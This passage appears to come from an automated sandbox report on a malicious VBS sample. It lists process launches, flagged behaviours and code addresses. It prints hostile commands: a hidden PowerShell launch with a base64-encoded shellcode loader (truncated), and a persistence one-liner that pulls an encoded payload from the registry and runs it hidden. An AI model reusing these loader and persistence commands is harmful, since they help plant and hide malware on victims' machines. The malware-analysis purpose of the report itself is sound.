Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08100040 25_2_08100040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08179608 25_2_08179608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0817CFE8 25_2_0817CFE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08173218 25_2_08173218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08173220 25_2_08173220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08175A68 25_2_08175A68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_081870E0 25_2_081870E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08186320 25_2_08186320
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Code function: 26_2_018F04B0 26_2_018F04B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03282648 28_2_03282648
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03284E58 28_2_03284E58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03286CB8 28_2_03286CB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03280CC0 28_2_03280CC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03280040 28_2_03280040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0328B588 28_2_0328B588
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03284B00 28_2_03284B00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_04CEE938 28_2_04CEE938
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0797ECE0 28_2_0797ECE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0797042D 28_2_0797042D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07970448 28_2_07970448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0797ECE0 28_2_0797ECE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07976E7B 28_2_07976E7B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07976DF0 28_2_07976DF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07973A08 28_2_07973A08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07973A28 28_2_07973A28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_08401DB8 28_2_08401DB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_08401DA8 28_2_08401DA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_08405118 28_2_08405118
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_086120B1 28_2_086120B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_086120B1 28_2_086120B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0328B579 28_2_0328B579
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07976EC0 28_2_07976EC0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 34_2_204623A0 34_2_204623A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 34_2_20462FA8 34_2_20462FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 34_2_20463850 34_2_20463850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 34_2_2046306F 34_2_2046306F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 37_2_203A2FA8 37_2_203A2FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 37_2_203A23A0 37_2_203A23A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 37_2_203A306F 37_2_203A306F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 37_2_203A3850 37_2_203A3850
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Java / VBScript file with very long strings (likely obfuscated code)
Source: IMG 0045434.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kxeayl3s.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1FFF.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB9D447D8E2849BB9EF6D8A3F7C9ADB.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: unknown Process created: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe "C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe"
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: unknown Process created: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe "C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe"
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3rumnuxb.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1B043D375E64A49ADE1599E795DF7E1.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kar5iszo.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC12B2DF4544A1496EA7EB89E07B3D3FC6.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
